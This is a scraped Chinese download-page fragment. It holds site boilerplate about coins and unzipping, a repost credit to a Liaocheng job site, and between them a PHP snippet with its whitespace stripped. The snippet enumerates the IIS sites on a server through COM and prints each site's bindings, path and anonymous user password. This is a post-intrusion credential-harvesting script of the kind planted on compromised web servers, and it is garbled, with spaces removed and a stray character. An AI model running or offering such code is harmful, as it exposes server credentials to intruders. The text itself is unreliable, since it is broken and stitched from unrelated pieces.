如果您无法下载资料,请参考说明:
1、部分资料下载需要金币,请确保您的账户上有足够的金币
2、已购买过的文档,再次下载不重复扣费
3、资料包下载后请先用软件解压,在使用对应软件打开
<?php$ObjService=newCOM("IIS://localhost/w3svc");foreach($ObjServiceas$obj3w){if(is_numeric($obj3w->Name)){$webSite=newCOM("IIS://localhost/w3svc/".$obj3w->Name.'/Root');echo"[ID]".$obj3w->Name.'</br>';echo"[NAME]".$obj3w->ServerComment.'</br>';$state=intval($obj3w->ServerState);if($state==2){echo"[STATE]running".'</br>';}if($state==4){echo"[STATE]stoped".'</br>';}if($state==6){echo"[STATE]paused".'</br>';}foreach($obj3w->ServerBindingsas$Binds){echo"[HOST]".$Binds.'</br>';}echo"[USER]".$webSite->AnonymousUserName.'</br>';echo"[PASS]".a$webSite->AnonymousUserPass.'</br>';echo"[PATH]".$webSite->path.'</br>';echo"-------------------------------------------".'</br>';}}?>转自聊城人才网http://www.liaochengrencai.net/